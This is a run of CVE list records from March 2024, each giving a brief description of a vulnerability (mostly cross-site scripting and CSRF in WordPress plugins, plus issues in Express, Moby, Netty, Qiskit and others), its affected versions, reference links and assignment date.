CVE    2024    29112    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Marketing Robot WooCommerce Google Feed Manager allows Stored XSS.This issue affects WooCommerce Google Feed Manager: from n/a through 2.2.0.    MISC:https://patchstack.com/database/vulnerability/wp-product-feed-manager/wordpress-woocommerce-google-feed-manager-plugin-2-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-product-feed-manager/wordpress-woocommerce-google-feed-manager-plugin-2-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29111    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webvitaly Sitekit allows Stored XSS.This issue affects Sitekit: from n/a through 1.6.    MISC:https://patchstack.com/database/vulnerability/sitekit/wordpress-sitekit-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/sitekit/wordpress-sitekit-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29110    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pauple Table & Contact Form 7 Database – Tablesome allows Reflected XSS.This issue affects Table & Contact Form 7 Database – Tablesome: from n/a through 1.0.27.    MISC:https://patchstack.com/database/vulnerability/tablesome/wordpress-tablesome-plugin-1-0-27-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tablesome/wordpress-tablesome-plugin-1-0-27-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29109    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jan-Peter Lambeck & 3UU Shariff Wrapper allows Stored XSS.This issue affects Shariff Wrapper: from n/a through 4.6.10.    MISC:https://patchstack.com/database/vulnerability/shariff/wordpress-shariff-wrapper-plugin-4-6-10-contributor-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/shariff/wordpress-shariff-wrapper-plugin-4-6-10-contributor-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29108    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leevio Happy Addons for Elementor allows Stored XSS.This issue affects Happy Addons for Elementor: from n/a through 3.10.1.    MISC:https://patchstack.com/database/vulnerability/happy-elementor-addons/wordpress-happy-addons-for-elementor-plugin-3-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/happy-elementor-addons/wordpress-happy-addons-for-elementor-plugin-3-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29107    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPVibes Elementor Addon Elements allows Stored XSS.This issue affects Elementor Addon Elements: from n/a through 1.12.10.    MISC:https://patchstack.com/database/vulnerability/addon-elements-for-elementor-page-builder/wordpress-elementor-addon-elements-plugin-1-12-10-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/addon-elements-for-elementor-page-builder/wordpress-elementor-addon-elements-plugin-1-12-10-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29106    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Addons for Elementor allows Stored XSS.This issue affects Premium Addons for Elementor: from n/a through 4.10.16.    MISC:https://patchstack.com/database/vulnerability/premium-addons-for-elementor/wordpress-premium-addons-for-elementor-plugin-4-10-16-cross-site-scripting-xss-vulnerability-2?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/premium-addons-for-elementor/wordpress-premium-addons-for-elementor-plugin-4-10-16-cross-site-scripting-xss-vulnerability-2?_s_id=cve    Assigned (20240315)
CVE    2024    29105    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Timersys WP Popups allows Stored XSS.This issue affects WP Popups: from n/a through 2.1.5.5.    MISC:https://patchstack.com/database/vulnerability/wp-popups-lite/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-popups-lite/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29104    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zimma Ltd. Ticket Tailor allows Stored XSS.This issue affects Ticket Tailor: from n/a through 1.10.    MISC:https://patchstack.com/database/vulnerability/ticket-tailor/wordpress-ticket-tailor-plugin-1-10-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ticket-tailor/wordpress-ticket-tailor-plugin-1-10-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29103    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NinjaTeam Database for Contact Form 7 allows Stored XSS.This issue affects Database for Contact Form 7: from n/a through 3.0.6.    MISC:https://patchstack.com/database/vulnerability/cf7-database/wordpress-database-for-contact-form-7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/cf7-database/wordpress-database-for-contact-form-7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29102    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes Extensions For CF7 allows Stored XSS.This issue affects Extensions For CF7: from n/a through 3.0.6.    MISC:https://patchstack.com/database/vulnerability/extensions-for-cf7/wordpress-extensions-for-cf7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/extensions-for-cf7/wordpress-extensions-for-cf7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29101    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jegtheme Jeg Elementor Kit allows Stored XSS.This issue affects Jeg Elementor Kit: from n/a through 2.6.2.    MISC:https://patchstack.com/database/vulnerability/jeg-elementor-kit/wordpress-jeg-elementor-kit-plugin-2-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/jeg-elementor-kit/wordpress-jeg-elementor-kit-plugin-2-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29099    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Evergreen Content Poster allows Reflected XSS.This issue affects Evergreen Content Poster: from n/a through 1.4.1.    MISC:https://patchstack.com/database/vulnerability/evergreen-content-poster/wordpress-evergreen-content-poster-plugin-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/evergreen-content-poster/wordpress-evergreen-content-poster-plugin-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29098    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Calameo WP Calameo allows Stored XSS.This issue affects WP Calameo: from n/a through 2.1.7.    MISC:https://patchstack.com/database/vulnerability/wp-calameo/wordpress-wp-calameo-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-calameo/wordpress-wp-calameo-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29097    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins User profile allows Stored XSS.This issue affects User profile: from n/a through 2.0.20.    MISC:https://patchstack.com/database/vulnerability/user-profile/wordpress-user-profile-plugin-2-0-20-subscriber-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/user-profile/wordpress-user-profile-plugin-2-0-20-subscriber-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29096    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt Manning MJM Clinic.This issue affects MJM Clinic: from n/a through 1.1.22.    MISC:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29095    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Ryley Site Reviews allows Stored XSS.This issue affects Site Reviews: from n/a through 6.11.6.    MISC:https://patchstack.com/database/vulnerability/site-reviews/wordpress-site-reviews-plugin-6-11-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/site-reviews/wordpress-site-reviews-plugin-6-11-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29094    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes HT Easy GA4 ( Google Analytics 4 ) allows Stored XSS.This issue affects HT Easy GA4 ( Google Analytics 4 ): from n/a through 1.1.7.    MISC:https://patchstack.com/database/vulnerability/ht-easy-google-analytics/wordpress-ht-easy-ga4-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ht-easy-google-analytics/wordpress-ht-easy-ga4-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29093    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Tobias Conrad Builder for WooCommerce reviews shortcodes – ReviewShort.This issue affects Builder for WooCommerce reviews shortcodes – ReviewShort: from n/a through 1.01.3.    MISC:https://patchstack.com/database/vulnerability/woo-product-reviews-shortcode/wordpress-builder-for-woocommerce-reviews-shortcodes-reviewshort-plugin-1-01-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woo-product-reviews-shortcode/wordpress-builder-for-woocommerce-reviews-shortcodes-reviewshort-plugin-1-01-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29092    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maciej Bis Permalink Manager Lite allows Reflected XSS.This issue affects Permalink Manager Lite: from n/a through 2.4.3.    MISC:https://patchstack.com/database/vulnerability/permalink-manager/wordpress-permalink-manager-lite-plugin-2-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/permalink-manager/wordpress-permalink-manager-lite-plugin-2-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29091    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dnesscarkey WP Armour – Honeypot Anti Spam allows Reflected XSS.This issue affects WP Armour – Honeypot Anti Spam: from n/a through 2.1.13.    MISC:https://patchstack.com/database/vulnerability/honeypot/wordpress-wp-armour-plugin-2-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/honeypot/wordpress-wp-armour-plugin-2-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29089    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Menu allows Stored XSS.This issue affects Five Star Restaurant Menu: from n/a through 2.4.14.    MISC:https://patchstack.com/database/vulnerability/food-and-drink-menu/wordpress-restaurant-menu-and-food-ordering-plugin-2-4-14-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/food-and-drink-menu/wordpress-restaurant-menu-and-food-ordering-plugin-2-4-14-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29071    Candidate    HGW BL1500HM Ver 002.001.013 and earlier contains a use of weak credentials issue. A network-adjacent unauthenticated attacker may change the system settings.    MISC:https://jvn.jp/en/vu/JVNVU93546510/   |   URL:https://jvn.jp/en/vu/JVNVU93546510/   |   MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/   |   URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/    Assigned (20240318)
CVE    2024    2906    Candidate    Missing Authorization vulnerability in SoftLab Radio Player. This issue affects Radio Player: from n/a through 2.0.73.    MISC:https://patchstack.com/database/vulnerability/radio-player/wordpress-radio-player-plugin-2-0-73-unauthenticated-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/radio-player/wordpress-radio-player-plugin-2-0-73-unauthenticated-broken-access-control-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    29059    Candidate    .NET Framework Information Disclosure Vulnerability    MISC:.NET Framework Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059    Assigned (20240314)
CVE    2024    29057    Candidate    Microsoft Edge (Chromium-based) Spoofing Vulnerability    MISC:Microsoft Edge (Chromium-based) Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29057    Assigned (20240314)
CVE    2024    29042    Candidate    Translate is a package that allows users to convert text to different languages on Node.js and the browser. Prior to version 3.0.0, an attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. Version 3.0.0 fixes this issue.    MISC:https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4   |   URL:https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4   |   MISC:https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3   |   URL:https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3   |   MISC:https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj   |   URL:https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj    Assigned (20240314)
CVE    2024    29041    Candidate    Express.js minimalist web framework for node. Versions of Express.js prior to 4.19.0 and all pre-release alpha and beta versions of 5.0 are affected by an open redirect vulnerability using malformed URLs. When a user of Express performs a redirect using a user-provided URL Express performs an encode [using `encodeurl`](https://github.com/pillarjs/encodeurl) on the contents before passing it to the `location` header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list. The main method impacted is `res.location()` but this is also called from within `res.redirect()`. The vulnerability is fixed in 4.19.2 and 5.0.0-beta.3.    MISC:https://expressjs.com/en/4x/api.html#res.location   |   URL:https://expressjs.com/en/4x/api.html#res.location   |   MISC:https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd   |   URL:https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd   |   MISC:https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94   |   URL:https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94   |   MISC:https://github.com/expressjs/express/pull/5539   |   URL:https://github.com/expressjs/express/pull/5539   |   MISC:https://github.com/expressjs/express/security/advisories/GHSA-rv95-896h-c2vc   |   URL:https://github.com/expressjs/express/security/advisories/GHSA-rv95-896h-c2vc   |   MISC:https://github.com/koajs/koa/issues/1800   |   URL:https://github.com/koajs/koa/issues/1800    Assigned (20240314)
CVE    2024    2904    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes Calliope. This issue affects Calliope: from n/a through 1.0.33.    MISC:https://patchstack.com/database/vulnerability/calliope/wordpress-calliope-theme-1-0-33-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/calliope/wordpress-calliope-theme-1-0-33-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    29037    Candidate    datahub-helm provides the Kubernetes Helm charts for deploying Datahub and its dependencies on a Kubernetes cluster. Starting in version 0.1.143 and prior to version 0.2.182, due to configuration issues in the helm chart, if there was a successful initial deployment during a limited window of time, personal access tokens were possibly created with a default secret key. Since the secret key is a static, publicly available value, someone could inspect the algorithm used to generate personal access tokens and generate their own for an instance. Deploying with Metadata Service Authentication enabled would have been difficult during this window of releases. If someone circumvented the helm settings and manually set Metadata Service Authentication to be enabled using environment variables directly, this would skip over the autogeneration logic for the Kubernetes Secrets and DataHub GMS would default to the signing key specified statically in the application.yml. Most deployments probably did not attempt to circumvent the helm settings to enable Metadata Service Authentication during this time, so impact is most likely limited. Any deployments with Metadata Service Authentication enabled should ensure that their secret values are properly randomized. Version 0.2.182 contains a patch for this issue. As a workaround, one may reset the token signing key to be a random value, which will invalidate active personal access tokens.    MISC:https://github.com/acryldata/datahub-helm/commit/ea8a17860f053c63387b8309e1f77c0e1462a1b3   |   URL:https://github.com/acryldata/datahub-helm/commit/ea8a17860f053c63387b8309e1f77c0e1462a1b3   |   MISC:https://github.com/acryldata/datahub-helm/security/advisories/GHSA-82p6-9h7m-9h8j   |   URL:https://github.com/acryldata/datahub-helm/security/advisories/GHSA-82p6-9h7m-9h8j    Assigned (20240314)
CVE    2024    29036    Candidate    Saleor Storefront is software for building e-commerce experiences. Prior to commit 579241e75a5eb332ccf26e0bcdd54befa33f4783, when any user authenticates in the storefront, anonymous users are able to access their data. The session is leaked through cache and can be accessed by anyone. Users should upgrade to a version that incorporates commit 579241e75a5eb332ccf26e0bcdd54befa33f4783 or later to receive a patch. A possible workaround is to temporarily disable authentication by changing the usage of `createSaleorAuthClient()`.    MISC:https://github.com/saleor/auth-sdk/commit/56db13407aa35d00b85ec2df042692edd4aea9da   |   URL:https://github.com/saleor/auth-sdk/commit/56db13407aa35d00b85ec2df042692edd4aea9da   |   MISC:https://github.com/saleor/saleor-docs/pull/1120   |   URL:https://github.com/saleor/saleor-docs/pull/1120   |   MISC:https://github.com/saleor/storefront/commit/579241e75a5eb332ccf26e0bcdd54befa33f4783   |   URL:https://github.com/saleor/storefront/commit/579241e75a5eb332ccf26e0bcdd54befa33f4783   |   MISC:https://github.com/saleor/storefront/security/advisories/GHSA-52cq-c7x7-cqw4   |   URL:https://github.com/saleor/storefront/security/advisories/GHSA-52cq-c7x7-cqw4    Assigned (20240314)
CVE    2024    29034    Candidate    CarrierWave is a solution for file uploads for Rails, Sinatra and other Ruby web frameworks. The vulnerability CVE-2023-49090 wasn't fully addressed. This vulnerability is caused by the fact that when uploading to object storage, including Amazon S3, it is possible to set a Content-Type value that is interpreted by browsers to be different from what's allowed by `content_type_allowlist`, by providing multiple values separated by commas. This bypassed value can be used to cause XSS. Upgrade to 3.0.7 or 2.2.6.    MISC:https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477   |   URL:https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477   |   MISC:https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw   |   URL:https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw    Assigned (20240314)
CVE    2024    29033    Candidate    OAuthenticator provides plugins for JupyterHub to use common OAuth providers, as well as base classes for writing one's own Authenticators with any OAuth 2.0 provider. `GoogleOAuthenticator.hosted_domain` is used to restrict what Google accounts can be authorized access to a JupyterHub. The restriction is intended to be to Google accounts that are part of one or more Google organizations verified to control the specified domain(s). Prior to version 16.3.0, the actual restriction has been to Google accounts with emails ending with the domain. Such accounts could have been created by anyone who at one time was able to read an email associated with the domain. This was described by Dylan Ayrey (@dxa4481) in this [blog post] from 15th December 2023. OAuthenticator 16.3.0 contains a patch for this issue. As a workaround, restrict who can log in another way, such as `allowed_users` or `allowed_google_groups`.    MISC:https://github.com/jupyterhub/oauthenticator/commit/5246b09675501b09fb6ed64022099b7644812f60   |   URL:https://github.com/jupyterhub/oauthenticator/commit/5246b09675501b09fb6ed64022099b7644812f60   |   MISC:https://github.com/jupyterhub/oauthenticator/security/advisories/GHSA-55m3-44xf-hg4h   |   URL:https://github.com/jupyterhub/oauthenticator/security/advisories/GHSA-55m3-44xf-hg4h   |   MISC:https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of   |   URL:https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of    Assigned (20240314)
CVE    2024    29032    Candidate    Qiskit IBM Runtime is an environment that streamlines quantum computations and provides optimal implementations of the Qiskit quantum computing SDK. Starting in version 0.1.0 and prior to version 0.21.2, deserializing json data using `qiskit_ibm_runtime.RuntimeDecoder` can lead to arbitrary code execution given a correctly formatted input string. Version 0.21.2 contains a fix for this issue.    MISC:https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159   |   URL:https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159   |   MISC:https://github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d   |   URL:https://github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d   |   MISC:https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m   |   URL:https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m    Assigned (20240314)
CVE    2024    29031    Candidate    Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.17 allows a remote attacker to obtain sensitive information via the `order` parameter of `GetMeshSyncResources`. Version 0.7.17 contains a patch for this issue.    MISC:https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13   |   URL:https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13   |   MISC:https://github.com/meshery/meshery/pull/10207   |   URL:https://github.com/meshery/meshery/pull/10207   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-249_Meshery/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-249_Meshery/    Assigned (20240314)
CVE    2024    29027    Candidate    Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 6.5.5 and 7.0.0-alpha.29, calling an invalid Parse Server Cloud Function name or Cloud Job name crashes the server and may allow for code injection, internal store manipulation or remote code execution. The patch in versions 6.5.5 and 7.0.0-alpha.29 added string sanitation for Cloud Function name and Cloud Job name. As a workaround, sanitize the Cloud Function name and Cloud Job name before it reaches Parse Server.    MISC:https://github.com/parse-community/parse-server/commit/5ae6d6a36d75c4511029f0ba5673ae4b2999179b   |   URL:https://github.com/parse-community/parse-server/commit/5ae6d6a36d75c4511029f0ba5673ae4b2999179b   |   MISC:https://github.com/parse-community/parse-server/commit/9f6e3429d3b326cf4e2994733c618d08032fac6e   |   URL:https://github.com/parse-community/parse-server/commit/9f6e3429d3b326cf4e2994733c618d08032fac6e   |   MISC:https://github.com/parse-community/parse-server/releases/tag/6.5.5   |   URL:https://github.com/parse-community/parse-server/releases/tag/6.5.5   |   MISC:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29   |   URL:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29   |   MISC:https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29   |   URL:https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29    Assigned (20240314)
CVE    2024    29026    Candidate    Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. In versions 0.1.2 and prior, a lenient CORS policy allows attackers to make a cross origin request, reading privileged information. This can be used to leak the admin password. Commit 9215d9ba0f29d62201d3feea9e77dcd274581624 fixes this issue.    MISC:https://github.com/owncast/owncast/blob/v0.1.2/router/middleware/auth.go#L32   |   URL:https://github.com/owncast/owncast/blob/v0.1.2/router/middleware/auth.go#L32   |   MISC:https://github.com/owncast/owncast/commit/9215d9ba0f29d62201d3feea9e77dcd274581624   |   URL:https://github.com/owncast/owncast/commit/9215d9ba0f29d62201d3feea9e77dcd274581624   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-261_Owncast/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-261_Owncast/    Assigned (20240314)
CVE    2024    29025    Candidate    Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `HttpPostRequestDecoder` can be tricked to accumulate data. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have; an attacker can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list. The decoder cumulates bytes in the `undecodedChunk` buffer until it can decode a field; this field can cumulate data without limits. This vulnerability is fixed in 4.1.108.Final.    MISC:https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3   |   URL:https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3   |   MISC:https://github.com/netty/netty/commit/0d0c6ed782d13d423586ad0c71737b2c7d02058c   |   URL:https://github.com/netty/netty/commit/0d0c6ed782d13d423586ad0c71737b2c7d02058c   |   MISC:https://github.com/netty/netty/security/advisories/GHSA-5jpm-x58v-624v   |   URL:https://github.com/netty/netty/security/advisories/GHSA-5jpm-x58v-624v    Assigned (20240314)
CVE    2024    29019    Candidate    ESPHome is a system to control microcontrollers remotely through Home Automation systems. API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page. In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5/ CVE-2024-27287 to obtain a complete takeover of the user account. Version 2024.3.0 contains a patch for this issue.    MISC:https://github.com/advisories/GHSA-9p43-hj5j-96h5   |   URL:https://github.com/advisories/GHSA-9p43-hj5j-96h5   |   MISC:https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99   |   URL:https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99    Assigned (20240314)
CVE    2024    29018    Candidate    Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. Moby's networking implementation allows for many networks, each with their own IP address range and gateway, to be defined. This feature is frequently referred to as custom networks, as each network can have a different driver, set of parameters and thus behaviors. When creating a network, the `--internal` flag is used to designate a network as _internal_. The `internal` attribute in a docker-compose.yml file may also be used to mark a network _internal_, and other API clients may specify the `internal` parameter as well. When containers with networking are created, they are assigned unique network interfaces and IP addresses. The host serves as a router for non-internal networks, with a gateway IP that provides SNAT/DNAT to/from container IPs. Containers on an internal network may communicate between each other, but are precluded from communicating with any networks the host has access to (LAN or WAN) as no default route is configured, and firewall rules are set up to drop all outgoing traffic. Communication with the gateway IP address (and thus appropriately configured host services) is possible, and the host may communicate with any container IP directly. In addition to configuring the Linux kernel's various networking features to enable container networking, `dockerd` directly provides some services to container networks. Principal among these is serving as a resolver, enabling service discovery, and resolution of names from an upstream resolver. When a DNS request for a name that does not correspond to a container is received, the request is forwarded to the configured upstream resolver. This request is made from the container's network namespace: the level of access and routing of traffic is the same as if the request was made by the container itself. 
As a consequence of this design, containers solely attached to an internal network will be unable to resolve names using the upstream resolver, as the container itself is unable to communicate with that nameserver. Only the names of containers also attached to the internal network are able to be resolved. Many systems run a local forwarding DNS resolver. As the host and any containers have separate loopback devices, a consequence of the design described above is that containers are unable to resolve names from the host's configured resolver, as they cannot reach these addresses on the host loopback device. To bridge this gap, and to allow containers to properly resolve names even when a local forwarding resolver is used on a loopback address, `dockerd` detects this scenario and instead forwards DNS requests from the host network namespace. The loopback resolver then forwards the requests to its configured upstream resolvers, as expected. Because `dockerd` forwards DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics entirely, internal networks can unexpectedly forward DNS requests to an external nameserver. By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers. Docker Desktop is not affected, as Docker Desktop always runs an internal resolver on a RFC 1918 address. Moby releases 26.0.0, 25.0.4, and 23.0.11 are patched to prevent forwarding any DNS requests from internal networks. As a workaround, run containers intended to be solely attached to internal networks with a custom upstream address, which will force all upstream DNS queries to be resolved from the container's network namespace.    
MISC:https://github.com/moby/moby/pull/46609   |   URL:https://github.com/moby/moby/pull/46609   |   MISC:https://github.com/moby/moby/security/advisories/GHSA-mq39-4gv4-mvpx   |   URL:https://github.com/moby/moby/security/advisories/GHSA-mq39-4gv4-mvpx    Assigned (20240314)
